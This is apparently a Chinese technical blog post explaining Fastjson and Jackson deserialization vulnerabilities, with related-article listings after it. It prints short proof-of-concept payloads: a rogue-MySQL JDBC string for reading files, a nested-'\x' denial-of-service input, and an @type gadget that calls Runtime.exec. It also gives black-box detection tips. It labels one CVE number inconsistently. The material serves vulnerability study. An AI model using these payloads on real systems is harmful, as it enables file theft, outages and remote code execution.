Fastjson反序列化漏洞

于 2024-08-09 20:21:52 发布
阅读量561 收藏 10
点赞数 26
文章标签: 安全 web安全 网络安全 json java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50296568/article/details/141056194
版权

文章目录

Fastjson反序列化漏洞

一、Fastjson历史漏洞

  1. 任意文件读取(CVE-2019-12086):使用了jackson-databind 2.x before 2.9.9的Java应用,如果ClassPath中有com.mysql.cj.jdbc.admin.MiniAdmin(存在于MySQL的JDBC驱动中)这个类,那么Java应用所在的服务器上的文件,就可能被任意读取并传送到恶意的MySQL Server。
  2. DOS攻击漏洞(CVE-2017-18386):在Fastjson 1.2.41之前的版本中,存在一个类型转换漏洞,它允许攻击者执行拒绝服务(DoS)攻击。CVE-2017-18386 的核心问题与 FastJSON 处理深度嵌套的 JSON 数据的方式有关。当 FastJSON 尝试解析具有过度嵌套的 JSON 数据时,可能会进入递归处理循环,从而耗尽栈内存,导致栈溢出。此栈溢出可能会导致 Java 应用程序崩溃或变得无响应,从而有效地导致拒绝服务。
  3. 远程代码执行(RCE)漏洞(CVE-2022-25845):影响版本为 1.2.83 之前的版本。FastJSON 漏洞的核心问题在于 “AutoType” 功能。AutoType 是一种机制,允许 JSON 解析器在反序列化过程中自动识别并实例化 Java 类。该漏洞允许攻击者利用 AutoType 机制实例化 classpath 中的任意类,随后利用这些类执行恶意代码。

一、CVE-2019-12086

POC

使用Rogue-Mysql-Server.py生成恶意mysql文件后,

    ObjectMapper om = new ObjectMapper();
    om.enableDefaultTyping();
 
    String poc = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://X.X.X.X:3306/db\"]";
    Object obj = om.readValue(poc, Object.class);

漏洞原理

使用恶意MySQL的url作为参数创建一个com.mysql.cj.jdbc.admin.MiniAdmin对象可以通过MySQL的JDBC驱动的com.mysql.cj.jdbc.admin.MiniAdmin类创建一个指定url的JDBC连接。再通过LOAD DATA LOCAL INFILE语句读取任意文件。
在mapper.readValue之后会调用BeanDeserializerBase.deserializeFromString()函数来反序列化内容并调用createFromString()函数创建实例对象,之后在NonRegisteringDriver.class中的connect方法进行连接初始化操作,最后会去解析连接。

二、CVE-2017-18368

POC

使用” \x “致使进入递归
{“a”:"\x

三、CVE-2022-25845

POC

public class Poc extends Exception {
    public void setName(String str) {
        try {
            Runtime.getRuntime().exec(str);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
-----------------------------------------------------------
public class PocDemo {
    public static void main(String[] args) {
        String json = "{\"@type\":\"java.lang.Exception\",\"@type\":\"Poc\",\"name\":\"calc\"}";
        JSON.parse(json);
    }

漏洞原理

在用户使用Autotype功能时,一开始通过checkAutoType时参数为(typeClass,expectClass:null,lexer.getFeaturse())//外层接口类为空//会经过Deserializer反序列化器到反序列化ThrowableDeserializer类进入到java.lang.Exception类里面查看异常属性类,在反序列化过程中通过上面的异常判断后会再次触发checkAutoType,再通过黑白名单的判断最后进行反序列化。
只要用户期望类继承自 Throwable 类,Fastjson便会将该类信任,从而造成只要是继承Throwable的任意类都可以被反序列化。

黑盒测试Fastjson反序列化漏洞

  1. 通过构造错误的POST请求体,服务器返回报错中查看是否存在fastjson字样
  2. DOS延迟方式时间判断:(fastjson版本在1.2.60以下)通过构造\x的POST参数造成DOS攻击判断
B1ackMa9ic
关注
  • 26
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson反序列化漏洞
qq_63980959的博客
03-01 1333
Fastjson是一款开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。​ fastjson反序列化weblogic、shiro反序列化类似,在客户端将json数据进行序列化传送至服务端后,服务端会将其反序列化读取其中数据,若客户端操控json数据,加入一些恶意类方法、代码,则可能会造成服务端代码执行。同时由于fastjson采用黑名单过滤的方式,也存在着被绕过的风险。
Fastjson 反序列化漏洞
Cover-3321的博客
01-09 2548
fastjson在解析json反序列化)的过程中,支持使用@Type来实例化一个具体类,且自动调用这个类的set/get方法来访问属性。黑客通过查找代码中的get方法,来远程加载恶意命令,即造成反序列化漏洞
fastjson反序列化漏洞原理
m0_73649671的博客
05-20 1011
fastjson反序列化漏洞原理
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 3081
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
fastjson反序列化漏洞手把手复现
潇逗
07-22 965
需要登录网址 https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html ,选择自己需要的java版本下载。ngrok使用参考https://editor.csdn.net/md/?这里第135后面跟的4444端口是开启Http映射的时候设置的端口,后面的9999端口是我们rmi服务用来监听的端口。(1)官网下载 https://maven.apache.org/download.cgi。
fastjson反序列化漏洞复现
san3144393495的博客
04-20 624
通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。
Fastjson 反序列化漏洞[1.2.24-rce]
流水不争先,争的是滔滔不绝
05-28 659
漏洞影响版本【1.2.24之前】
Fastjson反序列化漏洞详解
zhuyi666的博客
03-13 3027
fastjson介绍:fastjson 是一个java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse 的性能提升到了极致。FastJson是啊里巴巴的的开源库,用与对JSON格式的数据进行解析和打包。速度快使用广泛测试完备使用简单功能完备JSON数据格式{"name":zy, "age":22, "flag":true, "gender":male, "address":cs}("key":value)
java代码审计之fastjson反序列化漏洞
CheatMyself的博客
05-30 960
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。该产品主要提供了两个接口,JSON.toJSONString和JSON.parseObject/JSON.parse分别实现序列化和反序列化
Fastjson反序列化漏洞史1
08-03
在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的更新和漏洞时间线进行了梳理。由于Fastjson并未在CVE(Candidate Vulnerabilities Enumeration)数据库中注册,因此查找历史漏洞事件...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列化数据转换回内存中的对象的过程。在Java中,这一...
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSONFastjsonJSON) Genson(JSON) ...
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
Java后端处理前端字符串与 JSON 数据:安全拼接与转义技巧
最新发布
服务员的博客
08-09 123
在 Spring Boot 中处理前端传递的字符串和 JSON 数据时,需要注意潜在的 JSON 特殊字符问题。我们可以通过手动转义或借助 Jackson 库来安全地拼接字符串和 JSON 数据,确保数据完整性和程序稳定性。希望本文能够帮助您更好地理解 Spring Boot 中字符串与 JSON 数据处理的相关技巧,并在实际项目中得心应手。
【CVE-2024-38077】核弹级Windows RCE漏洞如何自检并修复该漏洞(附批量漏洞检测工具及分析伪代码)
m0_62783065的博客
08-09 3343
【CVE-2024-38077】核弹级RCE漏洞如何自检并修复该漏洞(附原文内分析伪代码)
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1078
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-09 392
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
fastjson 反序列化漏洞
08-24
fastjson 反序列化漏洞是指在使用 fastjson 库解析 JSON 字符串时存在安全风险的问题。具体来说,fastjson 反序列化漏洞是由于 fastjson 在处理特定的恶意构造的 JSON 字符串时,可能会触发不安全反序列化操作,导致攻击者能够执行任意代码或进行其他恶意操作。 这种漏洞通常是由于 fastjson反序列化过程中缺乏足够的安全检查和过滤机制,导致恶意用户能够构造特定的 JSON 字符串来触发漏洞。攻击者可以通过在 JSON 字符串中插入恶意的 Java 代码或利用已知的 Java 反序列化漏洞来执行任意代码。 为了防止 fastjson 反序列化漏洞的利用,建议遵循以下几点: 1. 尽量避免使用 fastjson 库,可以考虑使用其他更安全JSON 库。 2. 更新 fastjson 到最新版本,以获取最新的修复和安全增强功能。 3. 对用户输入的 JSON 字符串进行严格的验证和过滤,确保只有合法的、受信任的数据被反序列化。 4. 配置 fastjson 的 ParserConfig,限制反序列化操作只能处理预期的类型。 5. 避免在反序列化过程中执行不可信的代码,尽量将反序列化操作限制在有限的安全环境中。 总之,fastjson 反序列化漏洞是一个需要注意和防范的安全问题,开发者在使用 fastjson 库时应当保持警惕并采取相应的安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值